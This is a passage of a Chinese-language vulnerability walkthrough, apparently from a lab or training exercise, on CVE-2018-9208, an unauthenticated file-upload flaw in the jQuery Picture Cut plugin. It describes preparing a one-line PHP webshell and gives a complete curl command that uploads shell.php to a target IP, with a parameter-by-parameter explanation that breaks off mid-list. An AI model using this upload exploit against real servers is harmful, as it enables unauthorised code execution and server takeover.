2、CVE-2018-9208
2.1介绍
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
2.2.准备一个一句话木马的文件
2.3.使用curl进行连接,观察是否上传成功。
curl -F “inputOfFile=file” -F “request=upload” -F “enableResize=0” -F “minimumWidthToResize=0” -F “minimumHeightToResize=0” -F “folderOnServer=/” -F “imageNameRandom=1” -F “maximumSize=10000” -F “enableMaximumSize=0” -F “file=@shell.php” http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php
- -F “inputOfFile=file”:指定上传文件的参数名为"file"。
- -F “request=upload”:指定请求类型为上传。
- -F “enableResize=0”:禁用图片缩放功能。
- -F “minimumWidthToResize=0”:设置图片最小宽度为0,即不限制宽度。
- -F “minimumHeightToResize=0”:设置图片最小高度为0,即不限制高度。
- -F “folderOnServer=/”:指定上传到服务器的目录为根目录。
- -F “imageNameRandom=1”:设置上传后的文件名为随机生成的文件名。
- -F “maximumSize=10000”:设置上传文件的最大大小为10000字节。
- -F “enableMaximumSize